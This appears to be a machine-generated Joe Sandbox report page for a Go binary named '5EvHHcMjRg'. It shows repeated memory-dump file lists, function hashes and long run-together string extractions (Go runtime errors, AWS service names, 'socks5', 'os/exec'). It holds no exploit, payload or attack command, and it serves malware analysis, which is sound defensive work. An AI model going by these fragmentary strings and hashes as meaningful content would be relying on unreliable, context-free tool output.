Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine $ pages/byte s.sweepgen= allocCount end tracegcProcessPrng$1$MB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers$MB; allocated timeEndPeriod$mismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did n$pacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assig$sweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or inco
API String ID: 0-3276871650
Opcode ID: efc2b4084bb5ea4cf489b174a5bf2facdd4523c905f5c224c5b9a80b3ac3756e
Instruction ID: af00c7704fb45d93edc20625639e50f94bdca3c87de6eb952d911e142e2edc28
Opcode Fuzzy Hash: efc2b4084bb5ea4cf489b174a5bf2facdd4523c905f5c224c5b9a80b3ac3756e
Instruction Fuzzy Hash: EC51F3749497458FC344EF24C18166EBBE1BF88344F808A6DF88987355EB74E984DB92

Function 00AF2E50 Relevance: 10.1, Strings: 8, Instructions: 125COMMON

Download Yara Rule

Strings

found bad pointer in Go heap (incorrect use of unsafe or cgo?)limiterEvent.stop: found wrong event in p's limiter event slotslice length too short to convert to array or pointer to arrayruntime: internal error: misuse of lockOSThread/unlockOSThreadreflect: ref, xrefs: 00AF2ED8
runtime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 00AF2E71
span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failed, xrefs: 00AF2FEF
objectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks Lockedsetenvremoverenameexec: sysmontimersefenceselect, not next= jobs= goid sweep B -> % util alloc free span= prev= l, xrefs: 00AF2F62
>, xrefs: 00AF2EE1
runtime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with ni, xrefs: 00AF2EF3
to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplocked, xrefs: 00AF307C
to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not found, xrefs: 00AF2FB1

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failed$ to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not found$ to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplocked$>$found bad pointer in Go heap (incorrect use of unsafe or cgo?)limiterEvent.stop: found wrong event in p's limiter event slotslice length too short to convert to array or pointer to arrayruntime: internal error: misuse of lockOSThread/unlockOSThreadreflect: ref$objectnumberstringStringFormat[]byteactiveclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks Lockedsetenvremoverenameexec: sysmontimersefenceselect, not next= jobs= goid sweep B -> % util alloc free span= prev= l$runtime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/total:seconds/godebug/non-default-behavior/bcryptprimitives.dll not foundpanic called with ni$runtime: pointer g already scannedmark - bad statusscanobject n == 0swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
API String ID: 0-1298308350
Opcode ID: f3325710e169b802a448f6919370c5839dc9363308442c3d9a9ec0e92a252567
Instruction ID: ed17589c0bb1bfed8fb49131f6bc5dd77c99beedad9cf6d01b7eeab7e4bd8f10
Opcode Fuzzy Hash: f3325710e169b802a448f6919370c5839dc9363308442c3d9a9ec0e92a252567
Instruction Fuzzy Hash: 2851C7741897048FD340EFA4C085BAEBBE4AF58744F9088ADF48887352D7749988DFA3

Function 00AE2160 Relevance: 9.2, Strings: 7, Instructions: 483COMMON

Download Yara Rule

Strings

ermssse3avx2bmi1bmi2aossfipsgluelogsoidcosisqldbrbins3v4xrayIPv6IPv4exprstmtskipBOOL.aws%s%sNameAWS4typeenumareametaaposquotnbspcentsectcopyordfmacrsup2sup3parasup1ordmAumlEumlIumlOumlUumlaumleumliumloumluumlyumlfnofBetaZetaIotabetazetaiotabullreallarruarrrarr, xrefs: 00AE21C1
avx512bwavx512vlgo/typesnet/httpgo/buildx509sha1AWS ISOFcloudhsmcodestardatabrewdatasyncdatazonedms-fipsdynamodbeks-authfinspacefirehoseforecastgameliftiam-fipsProdFipsopsworksoutpostspinpointrds-dataredshiftsnowballtextracttransferaws-fipsworkdocsworkmailregi, xrefs: 00AE26F4
pclmulqdqmath/randAWS Chinaaws-iso-baws-iso-eaws-iso-fca-west-1appconfigapprunnerappstreamcassandracodebuilddiscoveryevidentlyguarddutyinspectorioteventslightsailmedialivememory-dbqbusinessrobomakerschedulersms-voicetranslatedualstack{service}expr_stmtexpiresA, xrefs: 00AE21DA
sse41sse42ssse3batchcaseschimedocdblocalemailkafkaomicspipespollywafv2startcommaFLOATcache.tmp-%s/%s (%s)- %s%s.%sECDSA31000host:ARN: paraminputframeiexclpoundlaquoacutemicrocedilraquoAcircAringAEligEcircIcircOcirctimesUcircTHORNszligacircaringaeligecircicirc, xrefs: 00AE2396
rdtscppopcntcmd/goaws-cnathenabackupbraketcloud9configeventshealthkendralambdamacie2nimbleprotonshieldsignerstateswisdomlegacy%s: %s%s%sSTRING/token1.55.5X-Amz-ignore%%%02Xrfc822currenbrvbarplusmnmiddotfrac14frac12frac34iquestAgraveAacuteAtildeCcedilEgraveEa, xrefs: 00AE21F3
adxaesshaavxfmanetawsacmapscurdaxdlmdmsdrsebsec2ecseksfmsfsxgeoiamiotivskmsmghmgnlexoamapiramrdsrumsdbsmssnssqsssmssostsswftaxtnbwafsepINT%s.ArnSTSRSADSAURIio.%20imgcolampyenumlnotshyregdegETHethEtaRhoTauPhiChiPsietarhotauphichipsipivsumangcapcupsimsuplozzwjlr, xrefs: 00AE2190
avx512fos/execruntimeUnknown%v: %#xaws-isoapi.awsaccountacm-pcaairflowamplifyapi.ecrpricingappflowappmeshappsyncbedrockbudgetsiotdataglaciergrafanaivschatkinesissandboxneptuneprofileroute53schemasssm-sapsupporttaggingvoiceidversion%s://%scommentliteralnewlinec, xrefs: 00AE26B3

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: adxaesshaavxfmanetawsacmapscurdaxdlmdmsdrsebsec2ecseksfmsfsxgeoiamiotivskmsmghmgnlexoamapiramrdsrumsdbsmssnssqsssmssostsswftaxtnbwafsepINT%s.ArnSTSRSADSAURIio.%20imgcolampyenumlnotshyregdegETHethEtaRhoTauPhiChiPsietarhotauphichipsipivsumangcapcupsimsuplozzwjlr$avx512bwavx512vlgo/typesnet/httpgo/buildx509sha1AWS ISOFcloudhsmcodestardatabrewdatasyncdatazonedms-fipsdynamodbeks-authfinspacefirehoseforecastgameliftiam-fipsProdFipsopsworksoutpostspinpointrds-dataredshiftsnowballtextracttransferaws-fipsworkdocsworkmailregi$avx512fos/execruntimeUnknown%v: %#xaws-isoapi.awsaccountacm-pcaairflowamplifyapi.ecrpricingappflowappmeshappsyncbedrockbudgetsiotdataglaciergrafanaivschatkinesissandboxneptuneprofileroute53schemasssm-sapsupporttaggingvoiceidversion%s://%scommentliteralnewlinec$ermssse3avx2bmi1bmi2aossfipsgluelogsoidcosisqldbrbins3v4xrayIPv6IPv4exprstmtskipBOOL.aws%s%sNameAWS4typeenumareametaaposquotnbspcentsectcopyordfmacrsup2sup3parasup1ordmAumlEumlIumlOumlUumlaumleumliumloumluumlyumlfnofBetaZetaIotabetazetaiotabullreallarruarrrarr$pclmulqdqmath/randAWS Chinaaws-iso-baws-iso-eaws-iso-fca-west-1appconfigapprunnerappstreamcassandracodebuilddiscoveryevidentlyguarddutyinspectorioteventslightsailmedialivememory-dbqbusinessrobomakerschedulersms-voicetranslatedualstack{service}expr_stmtexpiresA$rdtscppopcntcmd/goaws-cnathenabackupbraketcloud9configeventshealthkendralambdamacie2nimbleprotonshieldsignerstateswisdomlegacy%s: %s%s%sSTRING/token1.55.5X-Amz-ignore%%%02Xrfc822currenbrvbarplusmnmiddotfrac14frac12frac34iquestAgraveAacuteAtildeCcedilEgraveEa$sse41sse42ssse3batchcaseschimedocdblocalemailkafkaomicspipespollywafv2startcommaFLOATcache.tmp-%s/%s (%s)- %s%s.%sECDSA31000host:ARN: paraminputframeiexclpoundlaquoacutemicrocedilraquoAcircAringAEligEcircIcircOcirctimesUcircTHORNszligacircaringaeligecircicirc
API String ID: 0-3164501562
Opcode ID: f0c182c3cb555d0f5b46e2681d8a423178e9a7c44a8946196e2d1f658d7a34e0
Instruction ID: c86861b143d863c268942a17e3af28574a196f19f31e82aa4ce1f1da189e78a0
Opcode Fuzzy Hash: f0c182c3cb555d0f5b46e2681d8a423178e9a7c44a8946196e2d1f658d7a34e0
Instruction Fuzzy Hash: 353277B42083818FD728DF19D194B56BBE1FB98314F18C6ADD8488B35AE774D94ACF81

Function 00B1C520 Relevance: 8.9, Strings: 7, Instructions: 145COMMON

Download Yara Rule

Strings

., xrefs: 00B1C6AA
-, xrefs: 00B1C6BD
-, xrefs: 00B1C5F8
-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtp, xrefs: 00B1C574
+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3, xrefs: 00B1C58E
NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPU, xrefs: 00B1C60D
e, xrefs: 00B1C6AF

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: +Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3$-$-$-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtp$.$NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPU$e
API String ID: 0-3390551203
Opcode ID: 63c8251d2b01ace616dfefbd9f8cc74864fcd908655aa998dc5563694fef108b
Instruction ID: 53a063294c12bbe4255a3723f8c9be8be07fe31524735b0c2dec80c3f5bd3b5b
Opcode Fuzzy Hash: 63c8251d2b01ace616dfefbd9f8cc74864fcd908655aa998dc5563694fef108b
Instruction Fuzzy Hash: 65516D71409B448EC30BEF38D09536ABFD1AFB23C0F809B9EE48667196D77491D98642

Function 00AEC780 Relevance: 8.9, Strings: 7, Instructions: 128COMMON

Download Yara Rule

Strings

runtime: s.allocCount= s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetN, xrefs: 00AEC920
s.nelems= of size runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64, xrefs: 00AEC8B6, 00AEC95A
1, xrefs: 00AEC997
s.allocCount= key size wrongnil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod, xrefs: 00AEC87C
freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not o, xrefs: 00AEC900
s.allocCount > s.nelems/gc/heap/allocs:objectsmissing type in runfinqruntime: internal errorwork.nwait > work.nprocleft over markroot jobsgcDrain phase incorrectMB during sweep; swept bad profile stack countruntime: netpoll failedRtlGetNtVersionNumbers, xrefs: 00AEC8EA
s.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: wai, xrefs: 00AEC98E

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
